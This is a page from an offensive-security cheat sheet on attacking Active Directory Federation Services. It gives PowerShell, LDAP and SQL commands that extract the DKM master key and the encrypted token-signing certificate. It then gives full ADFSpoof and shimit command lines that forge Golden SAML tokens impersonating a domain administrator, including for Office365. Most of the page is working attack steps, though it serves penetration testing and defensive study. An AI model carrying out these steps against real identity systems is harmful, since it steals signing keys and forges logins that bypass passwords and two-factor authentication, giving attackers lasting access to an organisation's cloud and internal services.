ad-adfs-federation-services.md (7312B)
1 --- 2 title: "Active Directory - Federation Services" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/ad-adfs-federation-services.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adfs-federation-services.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Active Directory - Federation Services 12 13 Active Directory Federation Services (AD FS) is a software component developed by Microsoft that provides users with single sign-on (SSO) access to systems and applications located across organizational boundaries. It uses a claims-based access control authorization model to maintain application security and to provide seamless access to web-based applications that are hosted inside or outside the corporate network. 14 15 ## ADFS - DKM Master Key 16 17 * The DKM key is stored in the `thumbnailPhoto` attribute of the AD contact object. 18 19 ```ps1 20 $key=(Get-ADObject -filter 'ObjectClass -eq "Contact" -and name -ne "CryptoPolicy"' -SearchBase "CN=ADFS,CN=Microsoft,CN=Program Data,DC=domain,DC=local" -Properties thumbnailPhoto).thumbnailPhoto 21 [System.BitConverter]::ToString($key) 22 ``` 23 24 ## ADFS - Trust Relationship 25 26 Gets the relying party trusts of the Federation Service. 27 28 * Search for `IssuanceAuthorizationRules` 29 30 ```ps1 31 Get-AdfsRelyingPartyTrust 32 ``` 33 34 ## ADFS - Golden SAML 35 36 Golden SAML is a type of attack where an attacker creates a forged SAML (Security Assertion Markup Language) authentication response to impersonate a legitimate user and gain unauthorized access to a service provider. This attack leverages the trust established between the identity provider (IdP) and service provider (SP) in a SAML-based single sign-on (SSO) system. 37 38 * Golden SAML are effective even when 2FA is enabled. 39 * The token-signing private key is not renewed automatically 40 * Changing a user’s password won't affect the generated SAML 41 42 **Requirements**: 43 44 * ADFS service account 45 * The private key (PFX with the decryption password) 46 47 **Exploitation**: 48 49 * Run [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) on ADFS server as the **ADFS service account**. It will query the Windows Internal Database (WID): `\\.\pipe\MICROSOFT##WID\tsql\query` 50 * Convert PFX and Private Key to binary format 51 52 ```ps1 53 # For the pfx 54 echo AAAAAQAAAAAEE[...]Qla6 | base64 -d > EncryptedPfx.bin 55 # For the private key 56 echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin 57 ``` 58 59 * Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof), you might need to update the [dependencies](https://github.com/szymex73/ADFSpoof). 60 61 ```ps1 62 mkdir ADFSpoofTools 63 cd $_ 64 git clone https://github.com/dmb2168/cryptography.git 65 git clone https://github.com/mandiant/ADFSpoof.git 66 virtualenv3 venvADFSSpoof 67 source venvADFSSpoof/bin/activate 68 pip install lxml 69 pip install signxml 70 pip uninstall -y cryptography 71 cd cryptography 72 pip install -e . 73 cd ../ADFSpoof 74 pip install -r requirements.txt 75 python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.pentest.lab saml2 --endpoint https://www.contoso.com/adfs/ls 76 /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions '<Attribute Name="http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname"><AttributeValue>PENTEST\administrator</AttributeValue></Attribute>' 77 ``` 78 79 **Manual Exploitation**: 80 81 * Retrieve the WID path: `Get-AdfsProperties` 82 * Retrieve the ADFS Relying Party Trusts: `Get-AdfsRelyingPartyTrust` 83 * Retrieve the signing certificate, save the `EncryptedPfx` and decode it `base64 -d adfs.b64 > adfs.bin` 84 85 ```powershell 86 $cmd.CommandText = "SELECT ServiceSettingsData from AdfsConfigurationV3.IdentityServerPolicy.ServiceSettings" 87 $client= New-Object System.Data.SQLClient.SQLConnection($ConnectionString); 88 $client.Open(); 89 $cmd = $client.CreateCommand() 90 $cmd.CommandText = "SELECT name FROM sys.databases" 91 $reader = $cmd.ExecuteReader() 92 $reader.Read() | Out-Null 93 $name = $reader.GetString(0) 94 $reader.Close() 95 Write-Output $name; 96 ``` 97 98 * Retrieve the DKM key stored inside the `thumbnailPhoto` attribute of the Active Directory: 99 100 ```ps1 101 ldapsearch -x -H ldap://DC.domain.local -b "CN=ADFS,CN=Microsoft,CN=Program Data,DC=DOMAIN,DC=LOCAL" -D "adfs-svc-account@domain.local" -W -s sub "(&(objectClass=contact)(!(name=CryptoPolicy)))" thumbnailPhoto 102 ``` 103 104 * Convert the retrieved key to raw format: `echo "RETRIEVED_KEY_HERE" | base64 -d > adfs.key` 105 * Use [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof) to generate the Golden SAML 106 107 NOTE: There might be multiple master keys in the container, remember to try them all. 108 109 **Golden SAML Examples** 110 111 * SAML2: requires `--endpoint`, `--nameidformat`, `--identifier`, `--nameid` and `--assertions` 112 113 ```ps1 114 python ADFSpoof.py -b adfs.bin adfs.key -s adfs.domain.local saml2 --endpoint https://www.contoso.com/adfs/ls 115 /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions '<Attribute Name="http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname"><AttributeValue>PENTEST\administrator</AttributeValue></Attribute>' 116 ``` 117 118 * Office365: requires `--upn` and `--objectguid` 119 120 ```ps1 121 python3 ADFSpoof.py -b adfs.bin adfs.key -s sts.domain.local o365 --upn user@domain.local --objectguid 712D7BFAE0EB79842D878B8EEEE239D1 122 ``` 123 124 * Other: connect to the service provider using a known account, analyze the SAML token attributes given and reuse their format. 125 126 **NOTE**: Sync the time between the attacker's machine generating the Golden SAML and the ADFS server. 127 128 Other interesting tools to exploit AD FS: 129 130 * [secureworks/whiskeysamlandfriends/WhiskeySAML](https://github.com/secureworks/whiskeysamlandfriends/tree/main/whiskeysaml) - Proof of concept for a Golden SAML attack with Remote ADFS Configuration Extraction. 131 * [cyberark/shimit](https://github.com/cyberark/shimit) - A tool that implements the Golden SAML attack 132 133 ```ps1 134 python ./shimit.py -idp http://adfs.domain.local/adfs/services/trust -pk key -c cert.pem -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id REDACTED 135 ``` 136 137 ## References 138 139 * [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf) 140 * [Active Directory Federation Services (ADFS) Distributed Key Manager (DKM) Keys - Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/adfs_dkm_keys.html) 141 * [Exploring the Golden SAML Attack Against ADFS - 7 December 2021](https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs) 142 * [Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps - Shaked Reiner - 11/21/17](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps) 143 * [Meet Silver SAML: Golden SAML in the Cloud - Tomer Nahum and Eric Woodruff - Feb 29, 2024](https://www.semperis.com/blog/meet-silver-saml/)